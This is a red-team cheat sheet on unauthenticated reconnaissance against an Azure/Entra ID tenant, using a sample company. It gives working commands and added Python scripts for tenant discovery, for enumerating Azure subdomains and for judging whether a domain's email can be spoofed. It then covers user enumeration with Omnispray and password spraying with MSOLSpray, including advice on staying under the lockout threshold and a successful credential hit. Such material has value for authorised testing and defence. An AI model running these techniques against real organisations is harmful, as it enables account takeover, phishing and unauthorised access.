Cheatsheet - Azure - Unauthenticated reconnaissance
Check if domain is using Entra ID for authentication
Manual
Visiting the following URL:
https://login.microsoftonline.com/getuserrealm.srf?login=COMPANYDOMAIN&xml=1
and replacing COMPANYDOMAIN with the target domain will yield the following output should the company be using Entra ID for authentication:
<RealmInfo Success="true">
<State>4</State>
<UserState>1</UserState>
<Login>megabigtech.com</Login>
**<NameSpaceType>Managed</NameSpaceType>**
<DomainName>megabigtech.com</DomainName>
<IsFederatedNS>false</IsFederatedNS>
<FederationBrandName>Default Directory</FederationBrandName>
<CloudInstanceName>microsoftonline.com</CloudInstanceName>
<CloudInstanceIssuerUri>urn:federation:MicrosoftOnline</CloudInstanceIssuerUri>
</RealmInfo>
Note the NameSpaceType of Managed, which indicates that the domain belongs to an Entra ID tenant and that passwords are verified in the cloud. A NameSpaceType of Federated (IsFederatedNS true, plus an AuthURL element pointing at the organisation's own STS, typically AD FS) also means the domain is in Entra ID, but primary authentication is handed off to that STS, so password attacks have to go through it rather than through login.microsoftonline.com. A NameSpaceType of Unknown means no tenant has registered the domain.
Automated - via AADInternals
Install and import the required module:
Install-Module AADInternals
Import-Module AADInternals
We can then run the following:
Get-AADIntLoginInformation -Domain COMPANYDOMAIN
Example output:
Has Password : True
Federation Protocol :
Pref Credential : 1
Consumer Domain :
Cloud Instance audience urn : urn:federation:MicrosoftOnline
Authentication Url :
Throttle Status : 0
Account Type : Managed
Federation Active Authentication Url :
Exists : 1
Federation Metadata Url :
Desktop Sso Enabled :
Tenant Banner Logo :
Tenant Locale :
Cloud Instance : microsoftonline.com
State : 4
Domain Type : 3
Domain Name : megabigtech.com
Tenant Banner Illustration :
Federation Brand Name : Default Directory
Federation Global Version :
User State : 1
Locate information pertaining to the tenant
Manual
Visiting the following URL:
https://login.microsoftonline.com/COMPANYDOMAIN/.well-known/openid-configuration
returns the OpenID Connect metadata for the tenant that owns the domain (a domain that is not registered in any tenant gets an error response instead). The tenant ID, 2590ccef-687d-493b-ae8d-441cbab63a72 in this case, is embedded in every endpoint URL of the document, for example:
"token_endpoint": "https://login.microsoftonline.com/2590ccef-687d-493b-ae8d-441cbab63a72/oauth2/token",
"token_endpoint_auth_methods_supported": [
"client_secret_post",
"private_key_jwt",
"client_secret_basic"
]
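Both manual checks above (getuserrealm.srf for the authentication type, openid-configuration for the tenant ID) are two HTTP requests and a little parsing. The following is an added example, not code from the page or from AADInternals, that parses both responses offline against constructed sample documents (the Managed one is the response shown above; the Federated and Unknown shapes, the hostname adfs.example.com and the domain example.com are assumed for illustration) and can also fetch the live documents for a domain given on the command line.

```python
import json
import re
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample: the Managed getuserrealm.srf response shown above.
SAMPLE_MANAGED_XML = """<RealmInfo Success="true">
<State>4</State>
<UserState>1</UserState>
<Login>megabigtech.com</Login>
<NameSpaceType>Managed</NameSpaceType>
<DomainName>megabigtech.com</DomainName>
<IsFederatedNS>false</IsFederatedNS>
<FederationBrandName>Default Directory</FederationBrandName>
<CloudInstanceName>microsoftonline.com</CloudInstanceName>
<CloudInstanceIssuerUri>urn:federation:MicrosoftOnline</CloudInstanceIssuerUri>
</RealmInfo>"""

# Constructed sample of the Federated shape: AuthURL points at the organisation's
# STS. The domain and STS hostname are made up for this example.
SAMPLE_FEDERATED_XML = """<RealmInfo Success="true">
<Login>user@example.com</Login>
<NameSpaceType>Federated</NameSpaceType>
<DomainName>example.com</DomainName>
<IsFederatedNS>true</IsFederatedNS>
<FederationBrandName>Example Corp</FederationBrandName>
<AuthURL>https://adfs.example.com/adfs/ls/</AuthURL>
<CloudInstanceName>microsoftonline.com</CloudInstanceName>
</RealmInfo>"""

# Constructed sample of the Unknown shape: no tenant owns the domain.
SAMPLE_UNKNOWN_XML = """<RealmInfo Success="true">
<Login>nobody.invalid</Login>
<NameSpaceType>Unknown</NameSpaceType>
<CloudInstanceName>microsoftonline.com</CloudInstanceName>
</RealmInfo>"""

# Constructed sample of the openid-configuration fields this example reads
# (tenant ID taken from the page; region value assumed).
SAMPLE_OPENID_JSON = json.dumps({
    "token_endpoint": "https://login.microsoftonline.com/2590ccef-687d-493b-ae8d-441cbab63a72/oauth2/token",
    "issuer": "https://sts.windows.net/2590ccef-687d-493b-ae8d-441cbab63a72/",
    "tenant_region_scope": "EU",
})


def parse_user_realm(xml_text):
    """Pull the recon-relevant fields out of a RealmInfo document."""
    root = ET.fromstring(xml_text)
    if root.tag != "RealmInfo" or root.get("Success") != "true":
        raise ValueError("not a successful RealmInfo response")

    def text(tag):
        node = root.find(tag)
        return node.text if node is not None else None

    return {
        "domain": text("DomainName") or text("Login"),
        "namespace_type": text("NameSpaceType"),
        "federated": text("IsFederatedNS") == "true",
        "brand": text("FederationBrandName"),
        "auth_url": text("AuthURL"),  # only present for Federated
    }


def classify_realm(realm):
    """Map NameSpaceType to what it means for the assessment."""
    kind = realm["namespace_type"]
    if kind == "Managed":
        return "entra-id-managed"      # passwords verified in the cloud
    if kind == "Federated":
        return "entra-id-federated"    # tenant exists, creds checked at realm['auth_url']
    return "not-entra-id"              # Unknown: no tenant registered this domain


TENANT_ID_RE = re.compile(
    r"https://(?:login\.microsoftonline\.com|sts\.windows\.net)/([0-9a-f-]{36})/", re.I)


def openid_tenant_info(json_text):
    """The tenant GUID appears in every endpoint URL of the metadata document;
    tenant_region_scope gives the region AADInternals also reports."""
    cfg = json.loads(json_text)
    for key in ("token_endpoint", "authorization_endpoint", "issuer"):
        m = TENANT_ID_RE.search(cfg.get(key, ""))
        if m:
            return {"tenant_id": m.group(1).lower(), "region": cfg.get("tenant_region_scope")}
    raise ValueError("no tenant id found in openid-configuration")


def fetch_user_realm(domain, timeout=15):
    url = "https://login.microsoftonline.com/getuserrealm.srf?" + urllib.parse.urlencode(
        {"login": domain, "xml": "1"})
    with urllib.request.urlopen(url, timeout=timeout) as r:
        return parse_user_realm(r.read().decode())


def fetch_tenant_info(domain, timeout=15):
    url = f"https://login.microsoftonline.com/{domain}/.well-known/openid-configuration"
    with urllib.request.urlopen(url, timeout=timeout) as r:
        return openid_tenant_info(r.read().decode())


if __name__ == "__main__":
    import sys
    for domain in sys.argv[1:]:
        realm = fetch_user_realm(domain)
        verdict = classify_realm(realm)
        info = fetch_tenant_info(domain) if verdict != "not-entra-id" else {}
        print(domain, verdict, realm["auth_url"] or "", info)
```

Run it as python3 entra_recon.py megabigtech.com; a Federated verdict also prints the STS URL, which is where password attacks would actually land for that domain.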
Automated - via AADInternals
Install and import the required module:
Install-Module AADInternals
Import-Module AADInternals
We can then run the following:
Get-AADIntTenantID -Domain COMPANYDOMAIN
Perform tenant recon via AADInternals
Lookup various domain information for a given domain:
Invoke-AADIntReconAsOutsider -DomainName COMPANYDOMAIN
Example output:
Tenant brand: Default Directory
Tenant name: iancloudpwned.onmicrosoft.com
Tenant id: 2590ccef-687d-493b-ae8d-441cbab63a72
Tenant region: EU
DesktopSSO enabled: False
Name : iancloudpwned.mail.onmicrosoft.com
DNS : True
MX : True
SPF : True
DMARC : False
DKIM : False
MTA-STS : False
Type : Managed
STS :
Name : iancloudpwned.onmicrosoft.com
DNS : True
MX : True
SPF : True
DMARC : False
DKIM : False
MTA-STS : False
Type : Managed
STS :
Name : international-am.com
DNS : True
MX : True
SPF : True
DMARC : False
DKIM : False
MTA-STS : False
Type : Managed
STS :
Name : megabigtech.com
DNS : True
MX : True
SPF : True
DMARC : False
DKIM : False
MTA-STS : False
Type : Managed
STS :
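The SPF, DMARC, DKIM and MTA-STS columns in the output above are plain DNS TXT lookups, and the booleans hide the detail that decides whether the domain can be spoofed (the SPF "all" qualifier and the DMARC policy). The following is an added example, not code from the page or from AADInternals, that reproduces those columns and adds that detail; it runs offline against constructed TXT answers (the megabigtech.com entry mirrors the posture reported above, example-corp.test is made up) and uses dnspython for live lookups. The DKIM check only tries selector1 and selector2, the selectors Exchange Online uses by default, so a domain signing with other selectors would show DKIM false.

```python
import re

# Constructed sample TXT answers keyed by DNS name.
SAMPLE_TXT = {
    "megabigtech.com": ["v=spf1 include:spf.protection.outlook.com -all"],
    "example-corp.test": ["v=spf1 include:spf.protection.outlook.com ~all"],
    "_dmarc.example-corp.test": ["v=DMARC1; p=none; rua=mailto:dmarc@example-corp.test"],
    "selector1._domainkey.example-corp.test": ["v=DKIM1; k=rsa; p=MIIBIjANBgkq"],
}


def lookup_txt_sample(name):
    return SAMPLE_TXT.get(name, [])


def lookup_txt_live(name):
    """TXT lookup via dnspython (pip install dnspython). The resolver follows
    CNAMEs, which matters because Exchange Online publishes DKIM selectors as
    CNAMEs into the tenant's onmicrosoft.com zone."""
    import dns.resolver
    try:
        answers = dns.resolver.resolve(name, "TXT")
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
        return []
    return ["".join(s.decode() for s in rr.strings) for rr in answers]


def spf_all_qualifier(record):
    """Terminal 'all' mechanism of an SPF record: -all hard fail, ~all soft fail,
    ?all neutral, +all accepts any sender. None if the record has no 'all'."""
    m = re.search(r"(?:^|\s)([-~?+]?)all(?:\s|$)", record)
    return (m.group(1) or "+") + "all" if m else None


def dmarc_policy(record):
    m = re.search(r"\bp=(none|quarantine|reject)\b", record, re.I)
    return m.group(1).lower() if m else None


def mail_posture(domain, lookup=lookup_txt_live, dkim_selectors=("selector1", "selector2")):
    """The SPF/DMARC/DKIM/MTA-STS columns of the recon output, plus the policy
    detail behind them and a spoofability verdict."""
    spf = [t for t in lookup(domain) if t.lower().startswith("v=spf1")]
    dmarc = [t for t in lookup(f"_dmarc.{domain}") if t.lower().startswith("v=dmarc1")]
    dkim = {s: lookup(f"{s}._domainkey.{domain}") for s in dkim_selectors}
    mta_sts = [t for t in lookup(f"_mta-sts.{domain}") if t.lower().startswith("v=stsv1")]
    result = {
        "SPF": bool(spf),
        "SPF-all": spf_all_qualifier(spf[0]) if spf else None,
        "DMARC": bool(dmarc),
        "DMARC-policy": dmarc_policy(dmarc[0]) if dmarc else None,
        "DKIM": any(dkim.values()),
        "MTA-STS": bool(mta_sts),
    }
    # Without a DMARC policy of quarantine or reject, a receiver has no
    # instruction to enforce alignment, so the visible From: header can be
    # forged regardless of how strict SPF is.
    result["spoofable"] = result["DMARC-policy"] not in ("quarantine", "reject")
    return result


if __name__ == "__main__":
    import sys
    for d in sys.argv[1:] or ["megabigtech.com"]:
        lookup = lookup_txt_sample if d in SAMPLE_TXT else lookup_txt_live
        print(d, mail_posture(d, lookup))
```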
Locate well known subdomains
Azure assigns resources under a set of well-known DNS suffixes for common services, such as vault.azure.net for Azure Key Vault and blob.core.windows.net for Azure Blob Storage. A name under one of these suffixes only resolves once someone has claimed it, so guessing names derived from the target's brand and checking which resolve reveals the target's Azure footprint without touching Entra ID at all.
These can be enumerated for a given target using the tool AzSubEnum.
Setup:
git clone https://github.com/yuyudhn/AzSubEnum
cd AzSubEnum
pip3 install -r requirement.txt
Run:
python3 azsubenum.py -b <COMPANYNAME | e.g. megabigtech> --thread 10
Example output:
Discovered Subdomains:
App Services:
-----------------------------------
megabigtech.azurewebsites.net
App Services - Management:
---------------------------------------
megabigtech.scm.azurewebsites.net
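What AzSubEnum does is generate candidate hostnames from the base name and resolve them. The following is an added example, not AzSubEnum's own code, that shows the mechanics: the first two suffixes are the ones in the output above, the rest are other well-known Azure service suffixes and the permutation list is an assumption for illustration. Storage accounts and container registries only accept lowercase letters and digits in their names, so for those the permutation is concatenated rather than hyphenated, a detail wordlist-driven tools get wrong when they apply one pattern to every service.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# (suffix, service label, hyphen allowed in the resource name)
AZURE_SUFFIXES = [
    ("azurewebsites.net",      "App Services",              True),
    ("scm.azurewebsites.net",  "App Services - Management", True),
    ("blob.core.windows.net",  "Storage Accounts - Blob",   False),
    ("file.core.windows.net",  "Storage Accounts - File",   False),
    ("queue.core.windows.net", "Storage Accounts - Queue",  False),
    ("table.core.windows.net", "Storage Accounts - Table",  False),
    ("vault.azure.net",        "Key Vaults",                True),
    ("database.windows.net",   "SQL Databases",             True),
    ("documents.azure.com",    "Cosmos DB",                 True),
    ("azurecr.io",             "Container Registry",        False),
    ("servicebus.windows.net", "Service Bus",               True),
    ("azure-api.net",          "API Management",            True),
    ("azureedge.net",          "CDN",                       True),
    ("trafficmanager.net",     "Traffic Manager",           True),
    ("search.windows.net",     "Cognitive Search",          True),
]

# Assumed permutation list; a real run would use a longer, target-specific one.
DEFAULT_PERMUTATIONS = ("", "dev", "test", "prod", "staging", "api", "data")


def candidates(base, permutations=DEFAULT_PERMUTATIONS):
    """(hostname, service) for every suffix/permutation combination."""
    base = base.lower()
    out = []
    for suffix, service, hyphen_ok in AZURE_SUFFIXES:
        for p in permutations:
            if not p:
                name = base
            elif hyphen_ok:
                name = f"{base}-{p}"
            else:
                name = f"{base}{p}"   # no hyphens allowed: storage accounts, ACR
            out.append((f"{name}.{suffix}", service))
    return out


def resolves(host):
    """Existence test: these zones answer NXDOMAIN for unclaimed names and
    return an address for claimed ones, even if the resource is locked down."""
    try:
        socket.gethostbyname(host)
        return True
    except socket.gaierror:
        return False


def enumerate_azure(base, check=resolves, threads=10, permutations=DEFAULT_PERMUTATIONS):
    """{service: [existing hostnames]} in the style of the AzSubEnum report."""
    cands = candidates(base, permutations)
    with ThreadPoolExecutor(max_workers=threads) as ex:
        flags = list(ex.map(lambda c: check(c[0]), cands))
    found = {}
    for (host, service), ok in zip(cands, flags):
        if ok:
            found.setdefault(service, []).append(host)
    return found


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "megabigtech"
    for service, hosts in enumerate_azure(base).items():
        print(f"{service}:")
        for h in hosts:
            print(f"  {h}")
```

The check function is injectable so the generator and grouping can be exercised without DNS; a live run simply uses the default resolver.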
Password spraying/credential stuffing
Omnispray - user enumeration
Link: https://github.com/0xZDH/Omnispray
Omnispray aims to replace tools such as [o365spray](https://github.com/0xZDH/o365spray) and provide a modular framework to expand enumeration and spraying beyond just a single target/application.
We can create a users.txt file that contains a list of potentially valid logon addresses for users in the tenant. Then, we can run the following command:
python3 omnispray.py --type enum -uf users.txt --module o365_enum_office
Example output:
*** Omnispray ***
>---------------------------------------<
> version : 0.1.4
> module : o365_enum_office
> type : enum
> userfile : users.txt
> count : 1 passwords/spray
> lockout : 15.0 minutes
> wait : 5.0
> timeout : 25 seconds
> pause : 0.25 seconds
> rate : 10 threads
> start : 2025-01-07 11:27:51
>---------------------------------------<
/opt/Omnispray/omnispray.py:319: DeprecationWarning: There is no current event loop
loop = asyncio.get_event_loop()
[2025-01-07 11:27:51,286] INFO : Generating prerequisite data via office.com...
[2025-01-07 11:27:52,059] INFO : Enumerating 4 users via 'o365_enum_office' module
[2025-01-07 11:27:53,595] INFO : [ + ] yuki.tanaka@megabigtech.com
The example output above indicates that yuki.tanaka@megabigtech.com is a valid account in the tenant. The other three candidates produced no hit, which means either that they do not exist or that the username format guessed for them is wrong, so try the other common formats (first.last, flast, firstl) before ruling a person out.
MSOLSpray - password spraying/credential stuffing
MSOLSpray can be downloaded from the following repo:
https://github.com/dafthack/MSOLSpray/archive/master.zip
We can then dot source the file via . .\MSOLSpray.ps1 and target a list of user accounts against a single common password, for instance:
Keep to one password per run and wait between runs: Entra smart lockout locks an account after 10 failed attempts by default, and MSOLSpray stops the spray when it sees several lockout responses unless -Force is given.
Invoke-MSOLSpray -UserList user.txt -Password "Welcome123" -Verbose
Example output:
[*] There are 1 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 01/06/2025 17:37:51
VERBOSE: POST https://login.microsoft.com/common/oauth2/token with -1-byte payload
VERBOSE: received 3718-byte response of content type application/json; charset=utf-8
[*] SUCCESS! yuki.tanaka@megabigtech.com : Welcome123